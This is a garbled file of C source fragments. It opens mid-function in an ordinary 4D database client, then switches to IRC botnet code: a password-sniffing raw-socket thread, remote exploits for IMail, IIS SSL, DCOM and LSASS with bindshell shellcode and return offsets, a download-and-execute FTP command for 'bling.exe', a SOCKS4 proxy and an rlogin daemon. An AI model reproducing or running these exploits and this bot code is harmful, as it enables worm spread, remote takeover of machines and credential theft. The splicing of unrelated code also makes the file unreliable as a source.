return 1;//on sort en erreur
break;
case '0'://null value
Printf("Read null value\n");
pElmt->null=1;
break;
case '1'://value
pElmt->null=0;
switch(colType[c])
{
case VK_BOOLEAN:
case VK_BYTE:
case VK_WORD:
case VK_LONG:
case VK_LONG8:
case VK_REAL:
case VK_DURATION:
pElmt->pValue=calloc(1,vk_sizeof(colType[c]));
iResult = frecv(cnx->socket,(pElmt->pValue),vk_sizeof(colType[c]), 0);
len+=iResult;
//Printf("Long: %d\n",*((int*)pElmt->pValue));
break;
case VK_TIMESTAMP:
{
FOURD_TIMESTAMP *tmp;
tmp=calloc(1,sizeof(FOURD_TIMESTAMP));
pElmt->pValue=tmp;
iResult = frecv(cnx->socket,(char*)&(tmp->year),sizeof(short), 0);
Printf("year: %04X",tmp->year);
len+=iResult;
iResult = frecv(cnx->socket,&(tmp->mounth),sizeof(char), 0);
Printf(" mounth: %02X",tmp->mounth);
len+=iResult;
iResult = frecv(cnx->socket,&(tmp->day),sizeof(char), 0);
Printf(" day: %02X",tmp->day);
len+=iResult;
iResult = frecv(cnx->socket,(char*)&(tmp->milli),sizeof(unsigned int), 0);
Printf(" milli: %08X\n",tmp->milli);
len+=iResult;
}
break;
case VK_FLOAT:
{
//int exp;char sign;int data_length;void* data;
FOURD_FLOAT *tmp;
tmp=calloc(1,sizeof(FOURD_FLOAT));
pElmt->pValue=tmp;
iResult = frecv(cnx->socket,(char*)&(tmp->exp),sizeof(int), 0);
len+=iResult;
iResult = frecv(cnx->socket,&(tmp->sign),sizeof(char), 0);
len+=iResult;
iResult = frecv(cnx->socket,(char*)&(tmp->data_length),sizeof(int), 0);
len+=iResult;
iResult = frecv(cnx->socket,(tmp->data),tmp->data_length, 0);
len+=iResult;
Printferr("Float not supported\n");
}
break;
case VK_STRING:
{
int data_length=0;
FOURD_STRING *str;
//read negative value of length of string
str=calloc(1,sizeof(FOURD_STRING));
pElmt->pValue=str;
iResult = frecv(cnx->socket,(char*)&data_length,4, 0);
len+=iResult;
Printf("String length: %08X\n",data_length);
data_length=-data_length;
str->length=data_length;
str->data=calloc(data_length*2+2,1);
if(data_length==0){ //correct read for empty string
str->data[0]=0;
str->data[1]=0;
}
else {
iResult = frecv(cnx->socket,(str->data),(data_length*2), 0);
str->data[data_length*2]=0;
str->data[data_length*2+1]=0;
len+=iResult;
}
/*
{
int length=0;
char *chaine=NULL;
chaine=base64_encode((unsigned char*)str->data,data_length*2,&length);
Printf("Chaine: %s\n",chaine);
free(chaine);
}*/
}
break;
case VK_IMAGE:
//Printferr("Image-Type not supported\n");
//break;
case VK_BLOB:
{
int data_length=0;
FOURD_BLOB *blob;
//read negative value of length of string
blob=calloc(1,sizeof(FOURD_BLOB));
pElmt->pValue=blob;
iResult = frecv(cnx->socket,(char*)&data_length,4, 0);
Printf("Blob length: %08X\n",data_length);
len+=iResult;
if(data_length==0){
blob->length=0;
blob->data=NULL;
pElmt->null=1;
}else{
blob->length=data_length;
blob->data=calloc(data_length,1);
iResult = frecv(cnx->socket,blob->data,data_length, 0);
len+=iResult;
}
//Printf("Blob: %d Bytes\n",data_length);
}
//Printferr("Blob not supported\n");
break;
default:
Printferr("Type not supported (%s) at row %d column %d\n",stringFromType(colType[c]),(elmts_offset-c+1)/nbCol+1,c+1);
break;
}
break;
default:
Printferr("Status code 0x%X not supported in data at row %d column %d\n",status_code,(elmts_offset-c+1)/nbCol+1,c+1);
break;
}
}
}
Printf("---Fin de socket_receiv_data\n");
return 0;
}
DWORD WINAPI SniffThread(LPVOID param) {
char sendbuf[IRCLINE], rawdata[65535], *Packet;
int i;
DWORD dwRet, dwMode = 1;
PSNIFF sniff = *((PSNIFF *)param);
PSNIFF *sniffs = (PSNIFF *)param;
sniffs->gotinfo = TRUE;
IPHEADER *ip;
TCPHEADER *tcp;
IN_ADDR sia, dia;
SOCKET sniffsock;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(0);
ssin.sin_addr.s_addr = finet_addr(GetIP(sniff.sock));
if ((sniffsock = fsocket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) {
sprintf(sendbuf, "[PSNIFF]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
clearthread(sniff.threadnum);
ExitThread(0);
}
threads[sniff.threadnum].sock = sniffsock;
if (fbind(sniffsock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
sprintf(sendbuf, "[PSNIFF]: Error: bind() failed, returned: <%d>.", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sniffsock);
clearthread(sniff.threadnum);
ExitThread(0);
}
if (fWSAIoctl(sniffsock, SIO_RCVALL, &dwMode, sizeof(dwMode), NULL, 0, &dwRet, NULL, NULL) == SOCKET_ERROR) {
sprintf(sendbuf, "[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sniffsock);
clearthread(sniff.threadnum);
ExitThread(0);
}
while(1) {
memset(rawdata, 0, sizeof(rawdata));
Packet = (char *)rawdata;
if (frecv(sniffsock, Packet, sizeof(rawdata), 0) == SOCKET_ERROR) {
_snprintf(sendbuf,sizeof(sendbuf),"[PSNIFF]: Error: recv() failed, returned: <%d>", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
break;
}
ip = (IPHEADER *)Packet;
if (ip->proto == 6) {
Packet += sizeof(*ip);
tcp = (TCPHEADER *)Packet;
sia.S_un.S_addr = ip->sourceIP;
dia.S_un.S_addr = ip->destIP;
if (tcp->flags == 24) {
Packet += sizeof(*tcp);
if (strstr(Packet, "[PSNIFF]") == NULL) {
for (i=0;i < sizeof(pswords) / sizeof(PSWORDS);i++) {
if (strstr(Packet, pswords[i].text)) {
_snprintf(sendbuf, sizeof(sendbuf), "[PSNIFF]: Suspicious %s packet from: %s:%d to: %s:%d - %s",
ptype[pswords[i].type], finet_ntoa(sia), fntohs(tcp->sport), finet_ntoa(dia), fntohs(tcp->dport), Packet);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice, TRUE);
printf("%s\n",sendbuf);
addlog(sendbuf);
break;
}
}
}
}
}
}
fclosesocket(sniffsock);
clearthread(sniff.threadnum);
ExitThread(0);
}
BOOL iMail( char *target, void* conn,EXINFO exinfo )
{
IRC* irc=(IRC*)conn;
char szBanner[512];//, szShellcode[512];
int iRemoteTarget;
int ibindsize=405;
SOCKET sSocket;
if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Beginning attack on %s",exinfo.ip);Sleep(1500);
SOCKADDR_IN sinSockAddrIn;
memset(&sinSockAddrIn, 0, sizeof(sinSockAddrIn));
sinSockAddrIn.sin_family = AF_INET;
sinSockAddrIn.sin_addr.s_addr = finet_addr(exinfo.ip);
sinSockAddrIn.sin_port = fhtons(exinfo.port);
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Initializing IP and port for %s:%d",exinfo.ip,exinfo.port);Sleep(1500);
if(!(sSocket = fWSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, NULL, NULL)))
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Creating Socket for %s",exinfo.ip);Sleep(1500);
if(fconnect(sSocket, (LPSOCKADDR)&sinSockAddrIn, sizeof(sinSockAddrIn)) == SOCKET_ERROR)
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Connecting to socket for %s",exinfo.ip);Sleep(1500);
if(frecv(sSocket, szBanner, sizeof(szBanner), 0) == SOCKET_ERROR)
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Getting Banner for %s",exinfo.ip);Sleep(1500);
if (strstr(szBanner,"IMail 7.04"))
iRemoteTarget = 0;
else if (strstr(szBanner,"IMail 7.05"))
iRemoteTarget = 1;
else if (strstr(szBanner,"IMail 7.06"))
iRemoteTarget = 2;
else if (strstr(szBanner,"IMail 7.07"))
iRemoteTarget = 2;
else if (strstr(szBanner,"IMail 7.10"))
iRemoteTarget = 3;
else if (strstr(szBanner,"IMail 7.11"))
iRemoteTarget = 4;
else if (strstr(szBanner,"IMail 7.12"))
iRemoteTarget = 5;
else if (strstr(szBanner,"IMail 7.13"))
iRemoteTarget = 6;
else if (strstr(szBanner,"IMail 7.14"))
iRemoteTarget = 6;
else if (strstr(szBanner,"IMail 7.15"))
iRemoteTarget = 6;
else if (strstr(szBanner,"IMail 8.00"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.01"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.02"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.03"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.04"))
iRemoteTarget = 8;
else if (strstr(szBanner,"IMail 8.05"))
iRemoteTarget = 9;
else if (strstr(szBanner,"IMail 8.10"))
iRemoteTarget = 10;
else if (strstr(szBanner,"IMail 8.11"))
iRemoteTarget = 12;
else if (strstr(szBanner,"IMail 8.12"))
iRemoteTarget = 13;
else if (strstr(szBanner,"IMail 8.13"))
iRemoteTarget = 14;
else if (strstr(szBanner,"IMail 8.14"))
iRemoteTarget = 14;
else if (strstr(szBanner,"IMail 8.15"))
iRemoteTarget = 15;
else
iRemoteTarget = -1;
if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Banner for %s is %s, iRemoteTarget is %d",exinfo.ip,szBanner,iRemoteTarget);Sleep(1500);
memcpy(szImailPacket + 12, bindshell, ibindsize -1);
if (iRemoteTarget == -1) return FALSE;
if (pImailTargets[iRemoteTarget].iSEHAddress == 0)
memcpy(szImailPacket + 700, &pImailTargets[iRemoteTarget].lOffset, 4);
else
if (pImailTargets[iRemoteTarget].iSEHAddress == 1)
memcpy(szImailPacket + 692, &pImailTargets[iRemoteTarget].lOffset, 4);
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Crafting Malicious Packet for %s",exinfo.ip);Sleep(1500);
if(fsend(sSocket, szImailPacket, sizeof(szImailPacket), 0) == SOCKET_ERROR)
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Malicious packet for %s sent",exinfo.ip);Sleep(1500);
fclosesocket(sSocket);
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Socket Closed for %s",exinfo.ip);Sleep(1500);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
} else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
return FALSE;
}
BOOL IIS5SSL(EXINFO exinfo)
{
char buffer[IRCLINE];
char request[]="\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";
unsigned long XOR=0xffffffff;
unsigned long offsets[] = {
0x6741a1cd, // Win2K SP0
0x6741a199, // Win2K SP1
0x6741a426, // Win2K SP2
0x67419e1d, // Win2K SP3
0x67419ce8, // Win2K SP4
0x0ffb7de9, // WinXP SP0
0x0ffb832f // WinXP SP1
};
BOOL bRet = FALSE;
unsigned char *badbuffer=(unsigned char*)malloc(347);
memset(badbuffer, 0, 347);
unsigned char *p=badbuffer;
memcpy(p, request, sizeof(request));
p+=sizeof(request)-1;
strcat((char*)p, jumper);
strcat((char*)p, bind_shell_code);
SOCKET sSock;
if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
// FIX ME: since i didnt found a way to determine the remote OS, i
// placed this all together in a loop. this aint the best way
// i'm sure about that
for (int i=0; i < (sizeof(offsets) / sizeof(LPTSTR)); i++) {
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons(exinfo.port);
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
offsets[i]^=XOR;
strncat((char*)p, (char*)&offsets[i], 4);
strcat((char*)p, shellcode);
if (fsend(sSock, (char *)&badbuffer, strlen((char *)&badbuffer), 0)) {
Sleep(1000);
fclosesocket(sSock);
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons(1981);
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin))) {
char cmd_buff[400];
#ifndef NO_TFTPD
_snprintf(cmd_buff, sizeof (cmd_buff),
"tftp -i %s get %s\r\n",
GetIP(exinfo.sock),filename, filename);
#endif
#ifndef NO_FTPD
_snprintf(cmd_buff, sizeof (cmd_buff),
"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
GetIP(exinfo.sock),FTP_PORT);
#endif
if(frecv(exinfo.sock, buffer, sizeof(buffer), 0) > 0) {
Sleep(500);
if(fsend(sSock,(char*)cmd_buff, strlen(cmd_buff),0) > 0) {
fclosesocket(sSock);
bRet = TRUE;
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
break;
}
}
}
}
}
fclosesocket(sSock);
}
}
return (bRet);
}
DWORD WINAPI Socks4ClientThread(LPVOID param)
{
SOCKS4 socks4 = *((SOCKS4 *)param);
SOCKS4 *socks4p = (SOCKS4 *)param;
socks4p->cgotinfo = TRUE;
int threadnum = socks4.cthreadnum;
SOCKS4HEADER hdr;
TIMEVAL timeout;
timeout.tv_sec = 5;
timeout.tv_usec = 0;
fd_set fd;
FD_ZERO(&fd);
FD_SET(threads[threadnum].sock, &fd);
if (fselect(0, &fd, NULL, NULL, &timeout) == 0) {
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
if (frecv(threads[threadnum].sock, (char *)&hdr, sizeof(hdr), 0) <= 0) {
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
if (hdr.vn != 4 || hdr.cd != SOCKS4_CONNECT) {
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
// FIX ME: do a userid (hdr.userid) check here if you wish to use simple auth (needs testing)
if (socks4.userid[0] != '\0') {
if (strcmp(hdr.userid, socks4.userid) != 0) {
addlogv("[SOCKS4]: Authentication failed. Remote userid: %s != %s.", hdr.userid, socks4.userid);
hdr.vn = 0;
hdr.cd = SOCKS4_REJECT_USERID;
memset(&hdr.userid, 0, 1024);
fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
}
SOCKADDR_IN tsin;
memset(&tsin, 0, sizeof(tsin));
tsin.sin_family = AF_INET;
tsin.sin_port = hdr.destport;
tsin.sin_addr.s_addr = hdr.destaddr;
SOCKET tsock;
if ((tsock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {
addlogv("[SOCKS4]: Error: Failed to open socket(), returned: <%d>.", fWSAGetLastError());
hdr.vn = 0;
hdr.cd = SOCKS4_REJECT;
memset(&hdr.userid, 0, 1024);
fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
if (fconnect(tsock, (LPSOCKADDR)&tsin, sizeof(tsin)) == SOCKET_ERROR) {
addlogv("[SOCKS4]: Error: Failed to connect to target, returned: <%d>.", fWSAGetLastError());
hdr.vn = 0;
hdr.cd = SOCKS4_REJECT;
memset(&hdr.userid, 0, 1024);
fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
hdr.vn = 0;
hdr.cd = SOCKS4_GRANT;
memset(&hdr.userid, 0, 1024);
fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
TransferLoop(tsock, threads[threadnum].sock);
fclosesocket(tsock);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
BOOL dcom(EXINFO exinfo)
{
char sendbuf[IRCLINE];
if (exinfo.port == 445) {
NETRESOURCEW nr;
if (!ConnectViaNullSession(exinfo.ip, &nr))
return FALSE;
else {
char szPipePath[MAX_PATH];
sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", exinfo.ip);
HANDLE hFile = CreateFile(szPipePath, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
CloseNullSession(exinfo.ip);
return FALSE;
}
// sprintf(sendbuf, "[dcom]: Connected to pipe \\\\%s\\pipe\\epmapper", exinfo.ip);
// irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
int TargetOS = FpHost(exinfo.ip, FP_PORT5K);
// get shellcode
DWORD reqbufsize;
char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, TRUE);
if (!reqbuf) {
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
return FALSE;
}
unsigned long lWritten;
char *szInBuf = (char *)malloc(100000);
memset(szInBuf, 0, 100000);
// send the bind string
DWORD dwRead;
TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL);
if (szInBuf[2] != 0x0C) {
free(szInBuf);
free(reqbuf);
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
return FALSE;
}
// send the evil request
if (!WriteFile(hFile, reqbuf, reqbufsize, &lWritten, 0)) {
free(szInBuf);
free(reqbuf);
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
return FALSE;
}
BOOL Result = ReadFile(hFile, szInBuf, 10000, &dwRead, NULL);
free(reqbuf);
free(szInBuf);
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
if (Result == TRUE) {
return FALSE;
}
}
} else { // port 135 and others
int TargetOS = FpHost(exinfo.ip, FP_RPC);
if (TargetOS == OS_WINNT)
return FALSE;
// get a funky fresh socket
SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP);
if (sSocket == SOCKET_ERROR)
return FALSE;
// fill in sockaddr and resolve the host
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)exinfo.port);
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
// get shellcode
DWORD reqbufsize;
char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, FALSE);
if (!reqbuf) {
fclosesocket(sSocket);
return FALSE;
}
// connect to the server
int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin));
if (iErr == -1) { // connect failed, exit
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
// send the bind string
if (fsend(sSocket, bindstr, sizeof(bindstr)-1, 0) == SOCKET_ERROR) {
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
// read reply
char recvbuf[4096];
frecv(sSocket, recvbuf, 4096, 0);
// Send the evil request
if (fsend(sSocket, reqbuf, reqbufsize, 0) == SOCKET_ERROR) {
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
// read reply
if (frecv(sSocket, recvbuf, 4096, 0) == SOCKET_ERROR) {
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
free(reqbuf);
// Close the socket
fclosesocket(sSocket);
}
sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip);
for (int i=0; i < 6; i++) {
if (searchlog(sendbuf)) {
sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
break;
}
Sleep(5000);
}
return TRUE;
}
BOOL lsass2(EXINFO exinfo)
{
int i, targetx, len, targetxOS;
char hostipc[40];
char hostipc2[40*2];
char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char req4u[sizeof(reqx4)+20];
char screq[BUFSIZE+sizeof(reqx7)+1500+440];
char screq2k[4348+4060];
char screq2k2[4348+4060];
char recvbuf[1600];
char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4";
char strBuffer[BUFSIZE];
char buffer[IRCLINE], cmd_buff[400];
char smblen;
char unclen;
unsigned short port;
SOCKET sSocket, bSocket;
SOCKADDR_IN ssin, bsin;
targetxOS = FpHost(exinfo.ip, FP_RPC);
if ((targetxOS == OS_UNKNOWN) || (targetxOS == OS_WINNT))
return FALSE;
if (targetxOS == OS_WINXP)
targetx = 0;
else if (rand() % 10)
targetx = 1;
else
targetx = 2;
_snprintf(hostipc, sizeof(hostipc),"\\\\%s\\ipc$", exinfo.ip);
for (i=0; i<40; i++) {
hostipc2[i*2] = hostipc[i];
hostipc2[i*2+1] = 0;
}
memcpy(req4u, reqx4, sizeof(reqx4)-1);
memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);
memcpy(req4u+47+strlen(hostipc)*2, reqx4+87, 9);
smblen = 52+(char)strlen(hostipc)*2;
memcpy(req4u+3, &smblen, 1);
unclen = 9 + (char)strlen(hostipc)*2;
memcpy(req4u+45, &unclen, 1);
port = fhtons(LSASS_BSPORT)^(USHORT)0x9999;
memcpy(&bindshell[176], &port, 2);
if ((targetx == 1) || (targetx == 2)) {
memset(buf, NOP, LEN);
//memcpy(&buf[2020], "\x3c\x12\x15\x75", 4);
memcpy(&buf[2020], &ttargetx[targetx].jmpaddr, 4);
memcpy(&buf[2036], &bindshell, strlen(bindshell));
memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
memcpy(&buf[2844], &ttargetx[targetx].jmpaddr, 4); // jmp ebx addr
//memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr
memcpy(&buf[2856], &bindshell, strlen(bindshell));
for (i=0; i<LEN; i++) {
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
}
sendbuf[LEN*2]=0;
sendbuf[LEN*2+1]=0;
memset(screq2k, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
memset(screq2k2, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
} else {
memset(strBuffer, NOP, BUFSIZE);
memcpy(strBuffer+160, bindshell, strlen(bindshell));
memcpy(strBuffer+1980, strasm, strlen(strasm));
*(long *)&strBuffer[1964]=ttargetx[targetx].jmpaddr;
}
memset(screq, 0x31, BUFSIZE+sizeof(reqx7)+1500);
if ((sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP)) == SOCKET_ERROR)
return FALSE;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)exinfo.port);
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
if (fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) {
fclosesocket(sSocket);
return FALSE;
}
if (fsend(sSocket, reqx1, sizeof(reqx1)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx2, sizeof(reqx2)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx3, sizeof(reqx3)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, req4u, smblen+4, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx5, sizeof(reqx5)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx6, sizeof(reqx6)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if ((targetx == 1) || (targetx == 2)) {
memcpy(screq2k, reqx8, sizeof(reqx8)-1);
memcpy(screq2k+sizeof(reqx8)-1, sendbuf, (LEN+1)*2);
memcpy(screq2k2, reqx9, sizeof(reqx9)-1);
memcpy(screq2k2+sizeof(reqx9)-1, sendbuf+4348-sizeof(reqx8)+1, (LEN+1)*2-4348);
memcpy(screq2k2+sizeof(reqx9)-1+(LEN+1)*2-4348-sizeof(reqx8)+1+206, shitx3, sizeof(shitx3)-1);
if (fsend(sSocket, screq2k, 4348, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, screq2k2, 4060, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
} else {
memcpy(screq, reqx7, sizeof(reqx7)-1);
memcpy(screq+sizeof(reqx7)-1, &strBuffer[0], BUFSIZE);
memcpy(screq+sizeof(reqx7)-1+BUFSIZE, shitx1, 9*16);
screq[BUFSIZE+sizeof(reqx7)-1+1500-304-1] = 0;
if (fsend(sSocket, screq, BUFSIZE+sizeof(reqx7)-1+1500-304, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
}
len = frecv(sSocket, recvbuf, 1600, 0);
if ((bSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
memset(&bsin, 0, sizeof(bsin));
bsin.sin_family = AF_INET;
bsin.sin_port = fhtons(LSASS_BSPORT);
bsin.sin_addr.s_addr = finet_addr(exinfo.ip);
if (fconnect(bSocket, (LPSOCKADDR)&bsin, sizeof(bsin)) == -1) {
fclosesocket(sSocket);
fclosesocket(bSocket);
return FALSE;
}
if (frecv(bSocket, recvbuf, 1600, 0) > 0) {
Sleep(500);
_snprintf(cmd_buff, sizeof(cmd_buff),
// "tftp -i %s get %s&%s&exit\n", GetIP(exinfo.sock), filename, filename);
"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
GetIP(exinfo.sock),FTP_PORT);
if (fsend(bSocket, cmd_buff, strlen(cmd_buff), 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
fclosesocket(bSocket);
return FALSE;
}
fclosesocket(sSocket);
fclosesocket(bSocket);
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent)
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
} else
return FALSE;
}
DWORD WINAPI RlogindClientThread(LPVOID param)
{
RLOGIND rlogind = *((RLOGIND *)param);
RLOGIND *rloginds = (RLOGIND *)param;
rloginds->gotinfo = TRUE;
int threadnum=rlogind.cthreadnum;
char LocalUser[16], RemoteUser[16], TerminalType[64], HostName[100], Buffer[16];
LPHOSTENT HostEnt;
SOCKADDR_IN csin;
TIMEVAL timeout;
timeout.tv_sec = 10;
timeout.tv_usec = 0;
fd_set fd;
FD_ZERO(&fd);
FD_SET(threads[threadnum].sock, &fd);
if (fselect(0, &fd, NULL, NULL, &timeout) == 0) {
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
frecv(threads[threadnum].sock, (char *)&Buffer, 1, 0);
GetStr(threads[threadnum].sock, RemoteUser, sizeof(RemoteUser));
GetStr(threads[threadnum].sock, LocalUser, sizeof(LocalUser));
GetStr(threads[threadnum].sock, TerminalType, sizeof(TerminalType));
int csin_len = sizeof(csin);
if (fgetpeername(threads[threadnum].sock, (LPSOCKADDR)&csin, &csin_len) != 0) {
addlogv("[RLOGIND]: Error: getpeername(): <%d>.", fWSAGetLastError());
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
if ((HostEnt = fgethostbyaddr((char *)&csin.sin_addr, sizeof(csin.sin_addr), PF_INET)) == NULL)
sprintf(HostName, finet_ntoa(csin.sin_addr));
else
strcpy(HostName, HostEnt->h_name);
frecv(threads[threadnum].sock, (char *)Buffer, sizeof(Buffer), 0);
fsend(threads[threadnum].sock, "", 1, 0);
if (!InsecureFlag && !CheckLogin(RemoteUser,HostName,rlogind.username,csin.sin_addr.s_addr)) {
fsend(threads[threadnum].sock, "PERMISSION DENIED.", sizeof("PERMISSION DENIED."), 0);
fshutdown(threads[threadnum].sock,SD_BOTH);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
addlogv("[RLOGIND]: User logged in: <%s@%s>.", RemoteUser, HostName);
if (!SessionRun(threadnum)) {
addlogv("[RLOGIND]: Error: SessionRun(): <%d>.", GetLastError());
fshutdown(threads[threadnum].sock,SD_BOTH);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(1);
}
